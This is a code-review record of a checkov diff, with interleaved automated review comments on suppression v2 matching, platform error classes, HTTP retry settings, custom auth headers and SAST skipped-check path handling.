@@ -106,17 +145,27 @@ def _apply_suppressions_to_report(self, scan_report: Report) -> None: scan_report.failed_checks = still_failed_checks scan_report.passed_checks = still_passed_checks - def _check_suppressions(self, record: Record, suppressions: list[dict[str, Any]]) -> dict[str, Any] | None: + @staticmethod + def _should_omit_check(applied_suppression: dict[str, Any]) -> bool: + if applied_suppression['isV1']: + return False + if applied_suppression['ruleType'] == 'policy': + return True + return False + + def _check_suppressions(self, record: Record, suppressions: Optional[list[dict[str, Any]]], suppressions_v2: Optional[list[dict[str, Any]]]) -> dict[str, Any] | None: """ - Checks the specified suppressions against the specified record, returning the first applicable suppression, - or None of no suppression is applicable. - :param record: - :param suppressions: + Checks the specified suppressions against the specified record, returning the applied suppression, if any, else None :return: """ - for suppression in suppressions: - if self._check_suppression(record, suppression): - return suppression + if suppressions: + for suppression in suppressions: + if self._check_suppression(record, suppression): + return suppression + if suppressions_v2: + for suppression in suppressions_v2: + if self._check_suppression_v2(record, suppression): + return suppression return None def _check_suppression(self, record: Record, suppression: dict[str, Any]) -> bool: 
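Review bot: `_check_suppressions` evaluates every v1 suppression before any v2 one and returns the first match, so a v1 rule with a comment wins over a v2 `policy` rule that would have removed the check, and the new docstring should state that order since the two kinds now have different effects — e.g. `v1 suppressions are checked first, then v2; the first match is returned, so a v1 match shadows any v2 policy-level rule.` Stylistically the signature mixes `Optional[list[...]]` with the `dict[str, Any] | None` return on the same line; the file already uses PEP 604 unions, so `list[dict[str, Any]] | None` avoids the newly imported `Optional`. `_should_omit_check` reduces to `return not applied_suppression['isV1'] and applied_suppression['ruleType'] == 'policy'`.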
@@ -170,22 +219,64 @@ def _check_suppression(self, record: Record, suppression: dict[str, Any]) -> boo return False if self.bc_integration.repo_id and self.bc_integration.source_id and self.bc_integration.source_id in suppression['accountIds']\ and suppression['cves']: - repo_name = self.bc_integration.repo_id.replace('\\', '/').split('/')[-1] - suppression_path = suppression['cves'][0]['id'].replace('\\', '/') - file_abs_path = record.file_abs_path.replace('\\', '/') + repo_name = align_path(self.bc_integration.repo_id).split('/')[-1] + suppression_path = self._get_cve_suppression_path(suppression) + repo_file_path = align_path(record.repo_file_path) + file_abs_path = align_path(record.file_abs_path) if file_abs_path == suppression_path[1:] or \ file_abs_path == suppression_path or \ - file_abs_path.endswith("".join([repo_name, suppression_path])): + file_abs_path.endswith("".join([repo_name, suppression_path])) or \ + removeprefix(repo_file_path, '/') == removeprefix(suppression_path, '/'): return any(record.vulnerability_details and record.vulnerability_details['id'] == cve['cve'] for cve in suppression['cves']) return False elif type == 'LicenseType': return any(record.vulnerability_details and record.vulnerability_details['license'] == license_type - for license_type in suppression['licenseTypes']) + for license_type in suppression.get('licenseTypes', [])) return False + @staticmethod + def normalize_file_path(file_path: str) -> str: + """ + Returns the file path with a leading slash, if not already present + """ + return file_path if file_path.startswith('/') else f'/{file_path}' + + def _check_suppression_v2_file(self, record_file_path: str, suppression_file_path: str, suppression_repo_name: str) -> bool: + return self.bc_integration.repo_matches(suppression_repo_name)\ + and (suppression_file_path == record_file_path or suppression_file_path == convert_to_unix_path(record_file_path)) + + def _check_suppression_v2(self, record: Record, suppression: dict[str, 
Any]) -> bool: + if record.check_id not in suppression['checkovPolicyIds']: + return False + + type = suppression['ruleType'] + + if type == 'policy': + # We just checked the policy ID above + return True + elif type == 'finding': + pass # TODO how to map them? + elif type == 'file': + record_file_path = SuppressionsIntegration.normalize_file_path(record.repo_file_path) + for file_suppression in suppression['files']: + suppression_file_path = SuppressionsIntegration.normalize_file_path(file_suppression['filePath']) + if self._check_suppression_v2_file(record_file_path, suppression_file_path, file_suppression.get('repositoryName', '')): + return True + elif type == 'repository': + return any(self.bc_integration.repo_matches(repo.get('repositoryName', '')) for repo in suppression['repositories']) + return False + + def _get_cve_suppression_path(self, suppression: dict[str, Any]) -> str: + suppression_path: str = align_path(suppression['cves'][0]['id']) + # for handling cases of IR/docker (e.g: '/Dockerfile:/DockerFile.FROM) + suppression_path_parts = suppression_path.split(':') + if len(suppression_path_parts) == 2 and suppression_path_parts[1].startswith(suppression_path_parts[0]): + return suppression_path_parts[0] + return suppression_path + def _suppression_valid_for_run(self, suppression: dict[str, Any]) -> bool: """ Returns whether this suppression is valid. A suppression is NOT valid if: 
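Review bot: In `_check_suppression_v2` the `finding` rule type is a bare `pass  # TODO` that falls through to `return False`, so a platform finding-level v2 suppression is silently ignored and the user has no way to see why it did not apply; log it, e.g. `logging.debug(f'v2 suppression {suppression.get("id")} has ruleType finding, which is not supported yet')`, and mention the gap in the `_check_suppressions` docstring. The local `type = suppression['ruleType']` shadows the builtin (copied from `_check_suppression`); `rule_type` costs nothing. In the `file` and `repository` branches, `.get('repositoryName', '')` feeds an empty string into `repo_matches` when the platform omits the name — whether that matches every repository or none depends on `repo_matches`, which is not visible here, and a file suppression that matched across all repositories would be a silent over-suppression, so confirm and add a comment. `_check_suppression` starts outside this hunk.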
@@ -220,13 +311,12 @@ def pre_runner(self, runner: _BaseRunner) -> None: # not used pass - def get_policy_level_suppressions(self) -> dict[str, str]: + def get_policy_level_suppressions(self) -> dict[str, list[str]]: policy_level_suppressions = {} - for check_suppressions in self.suppressions.values(): + for check_suppressions in itertools.chain(self.suppressions.values(), self.suppressions_v2.values()): for suppression in check_suppressions: - if suppression.get("suppressionType") == "Policy": - policy_level_suppressions[suppression['id']] = suppression['policyId'] - break + if (suppression['isV1'] and suppression.get("suppressionType") == "Policy") or (not suppression['isV1'] and suppression.get("ruleType") == "policy"): + policy_level_suppressions[suppression['id']] = [suppression['policyId']] if suppression['isV1'] else suppression['policyIds'] return policy_level_suppressions def post_scan(self, merged_reports: list[Report]) -> None: diff --git a/checkov/common/bridgecrew/platform_errors.py b/checkov/common/bridgecrew/platform_errors.py index 6afb04129de..e5c3031ae93 100644 --- a/checkov/common/bridgecrew/platform_errors.py +++ b/checkov/common/bridgecrew/platform_errors.py @@ -1,9 +1,18 @@ -class BridgecrewAuthError(Exception): - def __init__(self, message: str = "Authorization error accessing Bridgecrew.cloud api. Please check bc-api-key") -> None: +class PlatformConnectionError(Exception): + def __init__(self, message: str) -> None: + self.message = message + + def __str__(self) -> str: + return f"PlatformConnectionError: {self.message}" + + +class BridgecrewAuthError(PlatformConnectionError): + def __init__(self, message: str = "Authorization error accessing the platform api. Please check your API keys and " + "Prisma API URL.") -> None: self.message = message def __str__(self) -> str: - return f"BCAuthError, {self.message} " + return f"BCAuthError: {self.message}" class ModuleNotEnabledError(Exception): 
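Review bot: `get_policy_level_suppressions` changes its return type from `dict[str, str]` to `dict[str, list[str]]` and drops the `break`, so every caller that consumed a single policy id per suppression (outside this diff) must be updated, and a v1 policy-level suppression that previously stopped at the first match per policy is now recorded for every such suppression. Both are plausibly intentional for the multi-policy v2 shape, but the signature change deserves a docstring noting that each value is the list of BC policy ids the suppression covers (one element for v1). `policy_level_suppressions = {}` also wants `: dict[str, list[str]]` now that the value type is declared.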
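Review bot: Neither the new `PlatformConnectionError.__init__` nor the rewritten `BridgecrewAuthError.__init__` calls `super().__init__(message)`, so `e.args` is empty; `__str__` hides that, but pickling such an exception — which happens when it crosses a `multiprocessing` boundary, and `platform_integration.py` has a spawn-mode path — reconstructs it as `cls(*e.args)`, i.e. `PlatformConnectionError()` with no `message`, and fails with `TypeError`. Add `super().__init__(message)` as the first line of both constructors; the explicit `self.message` attribute can stay for callers that read it.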
@@ -11,4 +20,4 @@ def __init__(self, message: str) -> None: self.message = message def __str__(self) -> str: - return f"ModuleNotEnabledError, {self.message} " + return f"ModuleNotEnabledError: {self.message}" diff --git a/checkov/common/bridgecrew/platform_integration.py b/checkov/common/bridgecrew/platform_integration.py index b528f16af61..ca954e5f401 100644 --- a/checkov/common/bridgecrew/platform_integration.py +++ b/checkov/common/bridgecrew/platform_integration.py @@ -19,6 +19,7 @@ import boto3 import dpath import urllib3 +import urllib.parse from botocore.config import Config from botocore.exceptions import ClientError from cachetools import cached, TTLCache 
@@ -28,19 +29,19 @@ from urllib3.exceptions import HTTPError, MaxRetryError from checkov.common.bridgecrew.check_type import CheckType -from checkov.common.bridgecrew.platform_errors import BridgecrewAuthError +from checkov.common.bridgecrew.platform_errors import BridgecrewAuthError, PlatformConnectionError from checkov.common.bridgecrew.platform_key import read_key from checkov.common.bridgecrew.run_metadata.registry import registry -from checkov.common.bridgecrew.wrapper import CDK_FRAMEWORK_PREFIX, persist_assets_results, reduce_scan_reports, \ +from checkov.common.bridgecrew.wrapper import persist_assets_results, reduce_scan_reports, \ persist_checks_results, \ enrich_and_persist_checks_metadata, checkov_results_prefix, persist_run_metadata, _put_json_object, \ persist_graphs, persist_resource_subgraph_maps, persist_reachability_results, \ persist_multiple_logs_stream from checkov.common.models.consts import SAST_SUPPORTED_FILE_EXTENSIONS, SUPPORTED_FILE_EXTENSIONS, SUPPORTED_FILES, SCANNABLE_PACKAGE_FILES from checkov.common.runners.base_runner import filter_ignored_paths -from checkov.common.sast.consts import SastLanguages +from checkov.common.sast.consts import SastLanguages, CDK_FRAMEWORK_PREFIX from checkov.common.typing import _CicdDetails, LibraryGraph -from checkov.common.util.consts import PRISMA_PLATFORM, BRIDGECREW_PLATFORM, CHECKOV_RUN_SCA_PACKAGE_SCAN_V2 +from checkov.common.util.consts import PRISMA_PLATFORM, BRIDGECREW_PLATFORM from checkov.common.util.data_structures_utils import merge_dicts from checkov.common.util.dockerfile import is_dockerfile from checkov.common.util.http_utils import ( @@ -57,7 +58,7 @@ REQUEST_READ_TIMEOUT, REQUEST_RETRIES, ) -from checkov.common.util.type_forcers import convert_prisma_policy_filter_to_dict, convert_str_to_bool +from checkov.common.util.type_forcers import convert_prisma_policy_filter_to_params, convert_str_to_bool from checkov.version import version as checkov_version if TYPE_CHECKING: 
@@ -67,7 +68,7 @@ from checkov.secrets.coordinator import EnrichedSecret from mypy_boto3_s3.client import S3Client from typing_extensions import TypeGuard - from checkov.common.sast.report_types import Match + from checkov.common.sast.report_types import Match, SkippedCheck SLEEP_SECONDS = 1 @@ -85,12 +86,26 @@ FileToPersist = namedtuple('FileToPersist', 'full_file_path s3_file_key') DEFAULT_REGION = "us-west-2" -GOV_CLOUD_REGION = 'us-gov-west-1' PRISMA_GOV_API_URL = 'https://api.gov.prismacloud.io' +JAKARTA_API_URL = 'https://api.id.prismacloud.io' + +API_URL_REGION_MAP = { + PRISMA_GOV_API_URL: 'us-gov-west-1', + JAKARTA_API_URL: 'ap-southeast-3' +} + +REGIONS_URL_NOT_SUPPORT_S3_ACCELERATE = { + PRISMA_GOV_API_URL, + JAKARTA_API_URL +} + MAX_RETRIES = 40 CI_METADATA_EXTRACTOR = registry.get_extractor() +REQUEST_STATUS_CODES_RETRY = [401, 408, 500, 502, 503, 504] +REQUEST_METHODS_TO_RETRY = ['DELETE', 'GET', 'HEAD', 'OPTIONS', 'PUT', 'TRACE', 'POST'] + class BcPlatformIntegration: def __init__(self) -> None: 
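Review bot: `REQUEST_STATUS_CODES_RETRY` includes `401` and `REQUEST_METHODS_TO_RETRY` includes `POST`, and both feed the `urllib3.Retry` built in `clean()`, so a plain bad API key is now re-sent `REQUEST_RETRIES` times before failing, and any POST issued through that pool (`_get_s3_creds` visibly POSTs; others presumably do too) is replayed on 408/5xx even if the server already acted on it. The later `'too many 401 error responses'` handler shows the 401 retry is deliberate, so record the reason next to the constant, e.g. `# NOTE: 401 and POST are retried deliberately — document why here; POST replays must be safe for every endpoint that uses this Retry`; if some POSTs are not idempotent, drop `POST`. The two new constants `API_URL_REGION_MAP` and `REGIONS_URL_NOT_SUPPORT_S3_ACCELERATE` must stay in lockstep; `REGIONS_URL_NOT_SUPPORT_S3_ACCELERATE = frozenset(API_URL_REGION_MAP)` removes the duplication.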
@@ -114,20 +129,28 @@ def clean(self) -> None: self.timestamp: str | None = None self.scan_reports: list[Report] = [] self.bc_api_url = normalize_bc_url(os.getenv('BC_API_URL')) - self.prisma_api_url = normalize_prisma_url(os.getenv('PRISMA_API_URL', 'https://api0.prismacloud.io')) + self.prisma_api_url = normalize_prisma_url(os.getenv('PRISMA_API_URL') or 'https://api0.prismacloud.io') self.prisma_policies_url: str | None = None self.prisma_policy_filters_url: str | None = None + self.custom_auth_headers: dict[str, str] = {} + self.custom_auth_token: str | None = None self.setup_api_urls() self.customer_run_config_response = None self.runtime_run_config_response = None - self.prisma_policies_response = None + self.prisma_policies_response: dict[str, str] | None = None + self.prisma_policies_exception_response: dict[str, str] | None = None self.public_metadata_response = None self.use_s3_integration = False self.s3_setup_failed = False self.platform_integration_configured = False self.http: urllib3.PoolManager | urllib3.ProxyManager | None = None self.http_timeout = urllib3.Timeout(connect=REQUEST_CONNECT_TIMEOUT, read=REQUEST_READ_TIMEOUT) - self.http_retry = urllib3.Retry(REQUEST_RETRIES, redirect=3) + self.http_retry = urllib3.Retry( + REQUEST_RETRIES, + redirect=3, + status_forcelist=REQUEST_STATUS_CODES_RETRY, + allowed_methods=REQUEST_METHODS_TO_RETRY + ) self.bc_skip_mapping = False self.cicd_details: _CicdDetails = {} self.support_flag_enabled = False @@ -139,6 +162,7 @@ def clean(self) -> None: self.daemon_process = False # set to 'True' when running in multiprocessing 'spawn' mode self.scan_dir: List[str] = [] self.scan_file: List[str] = [] + self.sast_custom_policies: str = '' def init_instance(self, platform_integration_data: dict[str, Any]) -> None: """This is mainly used for recreating the instance without interacting with the platform again""" 
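Review bot: `self.prisma_policies_response` and `self.prisma_policies_exception_response` are annotated `dict[str, str] | None` in `clean()`, but their consumer `_handle_customer_prisma_policy_metadata` takes `list[dict[str, Any]]` and only acts when `isinstance(prisma_policy_metadata, list)`, and `get_prisma_policies_for_filter` declares `dict[Any, Any] | None`; the three cannot all be right, and the annotation here should describe what the Prisma policies endpoint actually returns — likely `list[dict[str, Any]] | None` given the isinstance check, but confirm. `self.custom_auth_token` is a credential held on the instance, and `generate_instance_data` serialises the companion `custom_auth_headers`; a comment at these two declarations noting that they must never be logged or persisted alongside run metadata is worth the line. `clean()` starts and ends outside this hunk.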
@@ -153,7 +177,9 @@ def init_instance(self, platform_integration_data: dict[str, Any]) -> None: self.cicd_details = platform_integration_data["cicd_details"] self.credentials = platform_integration_data["credentials"] self.platform_integration_configured = platform_integration_data["platform_integration_configured"] - self.prisma_api_url = platform_integration_data["prisma_api_url"] + self.prisma_api_url = platform_integration_data.get("prisma_api_url", 'https://api0.prismacloud.io') + self.custom_auth_headers = platform_integration_data["custom_auth_headers"] + self.custom_auth_token = platform_integration_data["custom_auth_token"] self.repo_branch = platform_integration_data["repo_branch"] self.repo_id = platform_integration_data["repo_id"] self.repo_path = platform_integration_data["repo_path"] @@ -178,6 +204,7 @@ def generate_instance_data(self) -> dict[str, Any]: "credentials": self.credentials, "platform_integration_configured": self.platform_integration_configured, "prisma_api_url": self.prisma_api_url, + "custom_auth_headers": self.custom_auth_headers, "repo_branch": self.repo_branch, "repo_id": self.repo_id, "repo_path": self.repo_path, @@ -214,7 +241,7 @@ def setup_api_urls(self) -> None: self.runtime_run_config_url = f"{self.api_url}/api/v1/runtime-images/repositories" def is_prisma_integration(self) -> bool: - if self.bc_api_key and not self.is_bc_token(self.bc_api_key): + if (self.bc_api_key and not self.is_bc_token(self.bc_api_key)) or self.custom_auth_token: return True return False @@ -253,6 +280,8 @@ def is_bc_token(token: str | None) -> TypeGuard[str]: def get_auth_token(self) -> str: if self.is_bc_token(self.bc_api_key): return self.bc_api_key + if self.custom_auth_token: + return self.custom_auth_token # A Prisma Cloud Access Key was specified as the Bridgecrew token. if not self.prisma_api_url: raise ValueError("A Prisma Cloud token was set, but no Prisma Cloud API URL was set") 
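Review bot: `init_instance` reads `platform_integration_data["custom_auth_token"]` with a hard index, but `generate_instance_data` in the following hunk only adds `custom_auth_headers`, not `custom_auth_token`, so recreating the instance from generated data — the spawn-mode path this method exists for — raises `KeyError`, unless the key is added somewhere outside this diff. Either add `"custom_auth_token": self.custom_auth_token,` to `generate_instance_data` or read it with `platform_integration_data.get("custom_auth_token")`, mirroring the `.get("prisma_api_url", ...)` fallback introduced on the line above. `custom_auth_headers` then travel in the instance-data dict; if that dict is ever written to disk or logs, the custom headers, which are merged into every request's auth headers, go with it. `init_instance` starts and ends outside this hunk.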
@@ -373,6 +402,17 @@ def setup_bridgecrew_credentials( self.platform_integration_configured = True + def _get_source_id_from_repo_path(self, repo_path: str) -> str | None: + repo_path_parts = repo_path.split("/") + if not repo_path_parts and repo_path_parts[0] != 'checkov': + logging.error(f'failed to get source_id from repo_path. repo_path format is unknown: ${repo_path}') + return None + try: + return '/'.join(repo_path_parts[2:4]) + except IndexError: + logging.error(f'failed to get source_id from repo_path. repo_path format is unknown: ${repo_path}') + return None + def set_s3_integration(self) -> None: try: self.skip_fixes = True # no need to run fixes on CI integration @@ -381,7 +421,7 @@ def set_s3_integration(self) -> None: return self.bucket, self.repo_path = repo_full_path.split("/", 1) - + self.source_id = self._get_source_id_from_repo_path(self.repo_path) self.timestamp = self.repo_path.split("/")[-2] self.credentials = cast("dict[str, str]", response["creds"]) 
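Review bot: The guard in the new `_get_source_id_from_repo_path` can never fire: `str.split('/')` always returns at least one element, so `not repo_path_parts` is always `False` and the `and` short-circuits before `repo_path_parts[0] != 'checkov'` is evaluated; likewise `repo_path_parts[2:4]` is a slice and never raises `IndexError`, so the `try/except` is dead and a short path such as `checkov/x` yields `''` instead of `None`. The f-strings also carry a literal `$` in `${repo_path}`. Since `source_id` gates CVE suppressions (`self.bc_integration.source_id in suppression['accountIds']` in suppressions_integration), a wrongly derived value silently changes which suppressions apply, so validate the part count explicitly; confirm the expected layout before keeping the `[2:4]` slice.

```python
def _get_source_id_from_repo_path(self, repo_path: str) -> str | None:
    # expected layout (verify): checkov/<...>/<owner>/<repo>/... — parts [2:4] form the source id
    repo_path_parts = repo_path.split("/")
    if len(repo_path_parts) < 4 or repo_path_parts[0] != 'checkov':
        logging.error(f'failed to get source_id from repo_path. repo_path format is unknown: {repo_path}')
        return None
    return '/'.join(repo_path_parts[2:4])
```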
@@ -392,18 +432,35 @@ def set_s3_integration(self) -> None: self.use_s3_integration = True self.platform_integration_configured = True - except MaxRetryError: - logging.error("An SSL error occurred connecting to the platform. If you are on a VPN, please try " - "disabling it and re-running the command.", exc_info=True) - raise - except HTTPError: - logging.error("Failed to get customer assumed role", exc_info=True) - raise - except JSONDecodeError: - logging.error(f"Response of {self.integrations_api_url} is not a valid JSON", exc_info=True) - raise + except MaxRetryError as e: + # almost all failures should be caught by this block - we need to differentiate what actually happened + # for the causes that are almost certainly user error, we want to hide the exception details + # so that it does not look like checkov crashed due to a bug (stack traces are scary for users) + if str(e.reason) == 'too many 401 error responses': + logging.error('An authentication error occurred connecting to the platform after multiple retries. ' + 'Please verify that your API key and Prisma API URL are correct, and retry.') + elif isinstance(e.reason, urllib3.exceptions.SSLError): + logging.error("An SSL error occurred connecting to the platform. If you are on a VPN, please try " + f"disabling it and re-running the command. The error is: {e.reason}") + else: + logging.error('An error occurred connecting to the platform after multiple retries. Please verify your ' + 'API key and Prisma API URL, as well as network connectivity, and retry. If the problem ' + 'persists, please enable debug logs and contact support.') + logging.debug('The exception details:', exc_info=True) + raise PlatformConnectionError(str(e.reason)) from e + except HTTPError as e: + logging.error('An unexpected error occurred connecting to the platform. Please verify your ' + 'API key and Prisma API URL, as well as network connectivity, and retry. 
If the problem ' + 'persists, please enable debug logs and contact support.', exc_info=True) + raise PlatformConnectionError(str(e)) from e + except JSONDecodeError as e: + logging.error('An unexpected error occurred processing the response from the platform. Please verify your ' + 'API key and Prisma API URL, as well as network connectivity, and retry. If the problem ' + 'persists, please enable debug logs and contact support.', exc_info=True) + raise PlatformConnectionError(str(e)) from e except BridgecrewAuthError: - logging.error("Received an error response during authentication") + logging.error('An authentication error occurred connecting to the platform after multiple retries. ' + 'Please verify that your API keys and Prisma API URL are correct, and retry.') raise def set_s3_client(self) -> None: @@ -412,9 +469,10 @@ def set_s3_client(self) -> None: region = DEFAULT_REGION use_accelerate_endpoint = True - if self.prisma_api_url == PRISMA_GOV_API_URL: - region = GOV_CLOUD_REGION + + if self.prisma_api_url in REGIONS_URL_NOT_SUPPORT_S3_ACCELERATE: use_accelerate_endpoint = False + region = API_URL_REGION_MAP[self.prisma_api_url] try: config = Config( @@ -470,7 +528,8 @@ def _get_s3_creds(self, repo_id: str, token: str) -> dict[str, Any]: request = self.http.request("POST", self.integrations_api_url, # type:ignore[union-attr] body=json.dumps({"repoId": repo_id, "support": self.support_flag_enabled}), headers=merge_dicts({"Authorization": token, "Content-Type": "application/json"}, - get_user_agent_header())) + get_user_agent_header(), + self.custom_auth_headers)) logging.debug(f'Request ID: {request.headers.get("x-amzn-requestid")}') logging.debug(f'Trace ID: {request.headers.get("x-amzn-trace-id")}') if request.status == 403: 
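Review bot: The 401 branch in `set_s3_integration` keys on `str(e.reason) == 'too many 401 error responses'`, i.e. on the exact wording urllib3 puts into its `ResponseError`, so a rewording in a future urllib3 release silently routes real auth failures into the generic branch. `isinstance(e.reason, urllib3.exceptions.ResponseError) and '401' in str(e.reason)` survives rewording, and a comment naming the urllib3 version the text was taken from helps the next upgrade. The SSL branch prints `{e.reason}` while the generic branch deliberately hides exception text; both are defensible, but the asymmetry deserves a sentence in the comment above the `except`. The `try` this handles starts outside the hunk.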
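Review bot: In `_get_s3_creds` the new `self.custom_auth_headers` is the last argument to `merge_dicts`, so if later dicts win (the helper is not visible here) a custom `Authorization` or `Content-Type` entry silently replaces the token and JSON content type set just before it; the same ordering is used for every other request in this diff. If overriding `Authorization` is the intended way to plug in a custom auth scheme, say so in a comment at the `custom_auth_headers` declaration; if not, merge the custom headers first so the explicit ones take precedence. `_get_s3_creds` starts and ends outside this hunk.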
@@ -511,7 +570,7 @@ def persist_repository( for f in files: f_name = os.path.basename(f) _, file_extension = os.path.splitext(f) - if CHECKOV_RUN_SCA_PACKAGE_SCAN_V2 and file_extension in SCANNABLE_PACKAGE_FILES: + if file_extension in SCANNABLE_PACKAGE_FILES: continue if file_extension in SUPPORTED_FILE_EXTENSIONS or f_name in SUPPORTED_FILES: files_to_persist.append(FileToPersist(f, os.path.relpath(f, root_dir))) @@ -529,7 +588,7 @@ def persist_repository( filter_ignored_paths(root_path, f_names, excluded_paths) for file_path in f_names: _, file_extension = os.path.splitext(file_path) - if CHECKOV_RUN_SCA_PACKAGE_SCAN_V2 and file_extension in SCANNABLE_PACKAGE_FILES: + if file_extension in SCANNABLE_PACKAGE_FILES: continue full_file_path = os.path.join(root_path, file_path) relative_file_path = os.path.relpath(full_file_path, root_dir) @@ -592,6 +651,23 @@ def adjust_sast_match_location_path(self, match: Match) -> None: return + def adjust_sast_skipped_checks_path(self, skipped_checks_by_file: Dict[str, List[SkippedCheck]]) -> None: + for filepath in list(skipped_checks_by_file.keys()): + new_filepath = None + for dir in self.scan_dir: + if filepath.startswith(os.path.abspath(dir)): + file_dir = '/'.join(filepath.split('/')[0:-1]) + new_filepath = filepath.replace(os.path.abspath(file_dir), self.repo_path) # type: ignore + break + for file in self.scan_file: + if filepath == os.path.abspath(file): + file_dir = '/'.join(filepath.split('/')[0:-1]) + new_filepath = filepath.replace(os.path.abspath(file_dir), self.repo_path) # type: ignore + break + if new_filepath: + skipped_checks_by_file[new_filepath] = skipped_checks_by_file[filepath] + skipped_checks_by_file.pop(filepath) + @staticmethod def _delete_code_block_from_sast_report(report: Dict[str, Any]) -> None: if isinstance(report, dict): 
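Review bot: In the new `adjust_sast_skipped_checks_path`, the `scan_dir` branch rewrites the file's own directory (`file_dir`, the full dirname of `filepath`) to `self.repo_path` rather than the matched `dir` prefix, so `<dir>/sub/a.py` and `<dir>/other/a.py` both become `<repo_path>/a.py` and the second assignment overwrites the first in `skipped_checks_by_file`, losing its skipped checks. Unless `adjust_sast_match_location_path` (not visible) intentionally flattens the same way, compute the key relative to the matched directory: `new_filepath = os.path.join(self.repo_path, os.path.relpath(filepath, os.path.abspath(dir)))`. `str.replace` also substitutes every occurrence rather than the prefix, the loop variable `dir` shadows the builtin, and `os.path.dirname(filepath)` replaces the manual `split('/')` join while keeping Windows paths intact. The `# type: ignore` hints that `repo_path` may be `None` here, in which case `replace` raises `TypeError` — guard it or assert it is set.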
@@ -613,15 +689,17 @@ def save_sast_report_locally(sast_scan_reports: Dict[str, Dict[str, Any]]) -> No def persist_sast_scan_results(self, reports: List[Report]) -> None: sast_scan_reports = {} for report in reports: - if not report.check_type.startswith('sast'): + if not report.check_type.lower().startswith(CheckType.SAST): continue - if not report.sast_report: # type: ignore + if not hasattr(report, 'sast_report') or not report.sast_report: continue - for _, match_by_check in report.sast_report.rule_match.items(): # type: ignore + for _, match_by_check in report.sast_report.rule_match.items(): for _, match in match_by_check.items(): for m in match.matches: self.adjust_sast_match_location_path(m) - sast_scan_reports[report.check_type] = report.sast_report.model_dump(mode='json') # type: ignore + self.adjust_sast_skipped_checks_path(report.sast_report.skipped_checks_by_file) + + sast_scan_reports[report.check_type] = report.sast_report.model_dump(mode='json') if self.on_prem: BcPlatformIntegration._delete_code_block_from_sast_report(sast_scan_reports) @@ -825,7 +903,8 @@ def commit_repository(self, branch: str) -> str | None: "Content-Type": "application/json", 'x-api-client': self.bc_source.name, 'x-api-checkov-version': checkov_version}, - get_user_agent_header() + get_user_agent_header(), + self.custom_auth_headers )) response = json.loads(request.data.decode("utf8")) logging.debug(f'Request ID: {request.headers.get("x-amzn-requestid")}') 
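Review bot: `for _, match_by_check in report.sast_report.rule_match.items()` and the inner `for _, match in match_by_check.items()` discard their keys; `for match_by_check in report.sast_report.rule_match.values()` (and `.values()` on the inner dict) says the same thing without the throwaway `_`, and `if not getattr(report, 'sast_report', None):` collapses the new `hasattr`/truthiness pair into one check. Both are style only; the added `adjust_sast_skipped_checks_path` call sits before `model_dump`, which is the right order.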
@@ -888,11 +967,12 @@ def _persist_file(self, full_file_path: str, s3_file_key: str) -> None: sleep(SLEEP_SECONDS) curr_try += 1 else: - logging.error(f"failed to persist file {full_file_path} into S3 bucket {self.bucket}", - exc_info=True) + logging.error(f"failed to persist file {full_file_path} into S3 bucket {self.bucket}", exc_info=True) + logging.debug(f"file size of {full_file_path} is {os.stat(full_file_path).st_size} bytes") raise except Exception: logging.error(f"failed to persist file {full_file_path} into S3 bucket {self.bucket}", exc_info=True) + logging.debug(f"file size of {full_file_path} is {os.stat(full_file_path).st_size} bytes") raise if curr_try == tries: logging.error( @@ -909,7 +989,8 @@ def get_platform_run_config(self) -> None: self.get_public_run_config() def _get_run_config_query_params(self) -> str: - return f'module={"bc" if self.is_bc_token(self.bc_api_key) else "pc"}&enforcementv2=true' + # ignore mypy warning that this can be null + return f'module={"bc" if self.is_bc_token(self.bc_api_key) else "pc"}&enforcementv2=true&repoId={urllib.parse.quote(self.repo_id)}' # type: ignore def get_run_config_url(self) -> str: return f'{self.platform_run_config_url}?{self._get_run_config_query_params()}' @@ -930,7 +1011,8 @@ def get_customer_run_config(self) -> None: try: token = self.get_auth_token() headers = merge_dicts(get_auth_header(token), - get_default_get_headers(self.bc_source, self.bc_source_version)) + get_default_get_headers(self.bc_source, self.bc_source_version), + self.custom_auth_headers) self.setup_http_manager() if not self.http: 
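Review bot: The two new `logging.debug(f"file size of {full_file_path} is {os.stat(full_file_path).st_size} bytes")` lines in `_persist_file` run inside the failure handlers immediately before `raise`; if the upload failed because the file was removed or is unreadable, `os.stat` raises `OSError` there and that error replaces the one about to be re-raised, demoting the original S3 failure to an implicit `__context__`. Make the size lookup unable to mask the real error, e.g. `size = os.path.getsize(full_file_path) if os.path.exists(full_file_path) else 'unknown'` computed before the log call, or guard the `os.stat` with its own `except OSError`. `_persist_file` starts and ends outside this hunk.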
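Review bot: `_get_run_config_query_params` now calls `urllib.parse.quote(self.repo_id)`, and the `# type: ignore` acknowledges `repo_id` can be `None`, in which case `quote` raises `TypeError` where the old query string simply had no repo; if the run config must remain fetchable without a repo id, guard it: `repo_param = f'&repoId={urllib.parse.quote(self.repo_id, safe="")}' if self.repo_id else ''`. Note `quote` leaves `/` unescaped by default, so an `org/repo` id goes out as `repoId=org/repo`; use `safe=''` only if the platform expects the slash percent-encoded — confirm against the API.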
@@ -960,8 +1042,11 @@ def get_customer_run_config(self) -> None: self.customer_run_config_response = json.loads(request.data.decode("utf8")) logging.debug(f"Got customer run config from {platform_type} platform") - except Exception: - logging.warning(f"Failed to get the customer run config from {self.platform_run_config_url}", exc_info=True) + except Exception as e: + logging.warning(f"An unexpected error occurred getting the run configuration from {self.platform_run_config_url} " + "after multiple retries. Please verify your API key and Prisma API URL, and retry. If the " + "problem persists, please enable debug logs and contact support. The error is: " + f"{e}", exc_info=True) raise def get_reachability_run_config(self) -> Union[Dict[str, Any], None]: @@ -980,7 +1065,8 @@ def get_reachability_run_config(self) -> Union[Dict[str, Any], None]: try: token = self.get_auth_token() headers = merge_dicts(get_auth_header(token), - get_default_get_headers(self.bc_source, self.bc_source_version)) + get_default_get_headers(self.bc_source, self.bc_source_version), + self.custom_auth_headers) self.setup_http_manager() if not self.http: @@ -1021,7 +1107,8 @@ def get_runtime_run_config(self) -> None: token = self.get_auth_token() headers = merge_dicts(get_auth_header(token), - get_default_get_headers(self.bc_source, self.bc_source_version)) + get_default_get_headers(self.bc_source, self.bc_source_version), + self.custom_auth_headers) self.setup_http_manager() if not self.http: 
